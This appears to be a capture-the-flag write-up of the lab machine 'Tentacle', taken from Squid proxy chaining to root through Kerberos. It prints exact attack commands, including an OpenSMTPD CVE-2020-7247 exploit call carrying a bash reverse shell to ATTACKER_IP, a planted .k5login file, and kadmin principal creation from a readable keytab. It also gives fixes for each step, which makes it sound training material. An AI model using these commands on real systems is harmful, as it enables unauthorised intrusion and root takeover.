Tentacle
Summary
The company's internet-facing Squid proxy handed anyone the internal domain name and an employee's email address before they sent a single authenticated request. By chaining through two Squid hops and fetching an internal network-discovery file (WPAD), I mapped hidden subnets and found an unpatched mail server running a version of OpenSMTPD with a public, unauthenticated remote-code-execution vulnerability (CVE-2020-7247). Exploiting that flaw gave root access to the internal mail pod, where the employee's plaintext password was stored in a mail-client config file.
That password unlocked a Kerberos ticket, which authenticated an SSH session to the main domain server (user flag). A cron job that blindly rsynced a group-writable log directory into the admin home folder was abused to plant a Kerberos login-authorisation file, hijacking admin's SSH identity. As admin, the system Kerberos keytab — readable by the admin group — contained full KDC administrative credentials.
Those credentials were used to mint a root Kerberos principal; the built-in ksu utility then elevated to a root shell (root flag).
Command conventions
The commands below refer to the target by variable rather than by address. Bind them in your shell before running anything; recovered credentials are withheld and shown as [REDACTED: recovered credential].
export TARGET="<retired-instance-ip>"
export ATTACKER_IP="<your-vpn-address>"
export INTERNAL_HOST="<another-host-reached-after-pivoting>"
export INTERNAL_HOST2="<another-host-reached-after-pivoting>"
export INTERNAL_HOST3="<another-host-reached-after-pivoting>"
export INTERNAL_HOST4="<another-host-reached-after-pivoting>"
export INTERNAL_HOST5="<another-host-reached-after-pivoting>"
export INTERNAL_HOST6="<another-host-reached-after-pivoting>"
export INTERNAL_HOST7="<another-host-reached-after-pivoting>"
export INTERNAL_PREFIX="<the-first-three-octets-of-that-network>"
export PASSWORD2="<a-password-you-choose>"Attack path — how the box was taken
Exact commands 1
nmap -Pn -sV -sC -p22,53,88,3128 $TARGETExact commands 1
curl -s http://$TARGET:3128/nonexistent 2>&1 | grep -iE 'realcorp|admin|@'FixSuppress sensitive information from Squid error pagesMedium
Exact commands 2
cat > /tmp/pc-tentacle.conf <<'EOF'
dynamic_chain
proxy_dns
[ProxyList]
http $TARGET 3128
http 127.0.0.1 3128
http $INTERNAL_HOST3 3128
EOFproxychains4 -f /tmp/pc-tentacle.conf curl -s http://wpad.realcorp.htb/wpad.datFixRestrict Squid ACLs so external clients cannot reach internal hosts via proxy chainingCritical
Exact commands 2
for i in $(seq 1 254); do r=$(dig +short -x $INTERNAL_PREFIX.$i @$TARGET 2>/dev/null); [ -n "$r" ] && echo "$INTERNAL_PREFIX.$i -> $r"; doneproxychains4 -f /tmp/pc-tentacle.conf nc -nv $INTERNAL_HOST2 25Exact commands 4
searchsploit opensmtpdnc -lvnp 4444 &tcpdump -ni tun0 icmp &proxychains4 -f /tmp/pc-tentacle.conf python3 48038.py $INTERNAL_HOST2 25 j.nakazawa@realcorp.htb 'bash -c "bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1"'FixPatch OpenSMTPD immediately to close the unauthenticated RCE (CVE-2020-7247)Critical
Exact commands 5
cat /home/j.nakazawa/.msmtprccat > /tmp/krb5-tentacle.conf <<'EOF'
[libdefaults]
default_realm = REALCORP.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
[realms]
REALCORP.HTB = {
kdc = srv01.realcorp.htb
admin_server = srv01.realcorp.htb
}
[domain_realm]
.realcorp.htb = REALCORP.HTB
realcorp.htb = REALCORP.HTB
EOFKRB5_CONFIG=/tmp/krb5-tentacle.conf faketime -f '-79797s' kinit j.nakazawa@REALCORP.HTBKRB5_CONFIG=/tmp/krb5-tentacle.conf KRB5CCNAME=FILE:/tmp/jnak.ccache faketime -f '-79797s' ssh -K -o GSSAPIAuthentication=yes -o PreferredAuthentications=gssapi-with-mic j.nakazawa@srv01.realcorp.htbcat ~/user.txtFixRemove plaintext credentials from mail-client configuration filesHigh
Exact commands 4
cat /etc/crontab && cat /usr/local/bin/log_backup.shidecho 'j.nakazawa@REALCORP.HTB' > /var/log/squid/.k5loginKRB5_CONFIG=/tmp/krb5-tentacle.conf KRB5CCNAME=FILE:/tmp/jnak.ccache faketime -f '-79797s' ssh -K -o GSSAPIAuthentication=yes -o PreferredAuthentications=gssapi-with-mic admin@srv01.realcorp.htbFixPrevent cron jobs from copying externally controlled files into privileged home directoriesHigh
Exact commands 5
klist -kt /etc/krb5.keytabkadmin -kt /etc/krb5.keytab -p kadmin/admin -q "add_principal -pw $PASSWORD2 root@REALCORP.HTB"KRB5_CONFIG=/tmp/krb5-tentacle.conf faketime -f '-79797s' kinit root@REALCORP.HTBKRB5CCNAME=FILE:/tmp/root.ccache ksu root -e /usr/bin/idKRB5CCNAME=FILE:/tmp/root.ccache ksu root -e /usr/bin/cat /root/root.txtFixRestrict the Kerberos keytab to root-only access and remove the kadmin/admin principal from itCritical
Attack patterns used
The transferable techniques behind this compromise.
Cron Job AbuseLinux · Privilege EscalationT1053.003
What it is
Scheduled tasks running as root that invoke a writable script, a wildcard, or a relative path can be hijacked. Watching processes with pspy (no root needed) reveals cron jobs; if the executed file or its directory is writable, an unauthorised user overwrites it with a payload that runs at the next interval as root.
Why it works
Cron jobs are written for convenience and often reference world-writable paths or use unsafe wildcards (tar *). Remediate with absolute paths, restrictive permissions on scripts, and avoiding shell wildcards in privileged cron jobs.
Read more
Exposed services
| 22/tcp | ssh OpenSSH 8.0 (protocol 2.0) |
| 53/tcp | domain ISC BIND 9.11.20 (RedHat Enterprise Linux 8) |
| 88/tcp | kerberos-sec MIT Kerberos (server time: 2026-07-11 22:00:47Z) |
| 3128/tcp | http-proxy Squid http proxy 4.11 |